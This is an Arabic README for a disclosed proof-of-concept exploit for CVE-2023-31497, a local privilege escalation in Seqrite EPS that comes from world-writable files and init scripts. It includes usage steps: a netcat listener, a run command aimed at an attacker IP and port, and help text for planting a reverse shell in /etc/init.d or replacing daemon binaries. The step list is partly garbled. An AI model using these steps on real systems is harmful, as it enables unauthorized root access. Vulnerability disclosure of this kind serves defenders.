
استغلال لثغرة رفع الامتيازات في QuickHeal's Seqrite EPS (CVE-2023-31497).
ثغرة رفع امتيازات في حل Seqrite Enterprise Endpoint Security (EPS) من QuickHeal. تم تعيين معرف CVE-2023-31497 لهذه الثغرة.
مع تثبيته الافتراضي، يتم تثبيت أمان نقطة النهاية من Seqrite في /usr/lib/Seqrite/ بأذونات دليل وملف ضعيفة جدًا تمنح المستخدم المحلي صلاحية القراءة/الكتابة الكاملة لمحتويات الدليل. بالإضافة إلى ذلك، تقوم عملية التثبيت بتثبيت نصوص بدء التشغيل في /etc/init.d/ وهي قابلة للكتابة من قبل الجميع. وهذا يمكن أي مستخدم منخفض الامتياز على النظام من رفع امتيازاته إلى الجذر.
يستخدم الاستغلال ثغرتين مختلفتين قدمهما البرنامج لرفع الامتيازات على النظام. أولاً، حقيقة أن التطبيق يستخدم نصوصًا في /etc/init.d/ لبدء عمليات المسح الخاصة به، والتي يمكن لأي مستخدم الكتابة فيها. ثانيًا، يستخدم التطبيق الكائنات المشتركة لتحميل الشفرة المستقلة عن الموضع (PIC) ديناميكيًا أثناء وقت التشغيل. في الواقع، جميع ملفات الكائنات المشتركة القابلة للتنفيذ قابلة للكتابة من قبل الجميع. أخيرًا، الملفات الثنائية للتطبيق المستخدمة في عملية الخفي قابلة للكتابة من قبل الجميع، مما يعني أساسًا أن أي مستخدم غير مميز يمكنه استبدال الملفات الثنائية للماسح بملف ثنائي لصدفة عكسية لتنفيذ كود عشوائي كـ root.
الاستغلال هو ملف Python بسيط يساعد في استغلال الثغرة.
الخطوات:
nc -lvp <port>) أو metasploit (multi/handler).epscalate.py و shellcode.c إلى النظام المستهدف.python3 epscalate.py -H 192.168.0.103:9999 -I).مساعدة الاستغلال:
$ python epscalate.py -h
EPSCALATE - PoC for privesc in Seqrite EPS
~ 0xInfection
usage: epscalate.py -H <host>:<port> <technique_flag>
options:
-h, --help show this help message and exit
-H HOSTPORT, --hostport HOSTPORT
The IP and port of the listening attacker machine in format of <ip>:<port>
-B, --daemon-binaries
Overwrite the main daemon binaries to escalate privileges.
-I, --initd-scripts Posion /etc/init.d/ bash startup scripts with a reverse shell to escalate privileges.
تم اختبار الاستغلال على جميع أنظمة التشغيل المستندة إلى Debian و Ubuntu.
تم نشر كود الاستغلال بموجب رخصة Apache 2.0. تم الإبلاغ عن الثغرة للبائع وتم إصلاحها وقت نشر الثغرة.
إسناد الثغرة والاستغلال: Pinaki Mondal (0xInfection).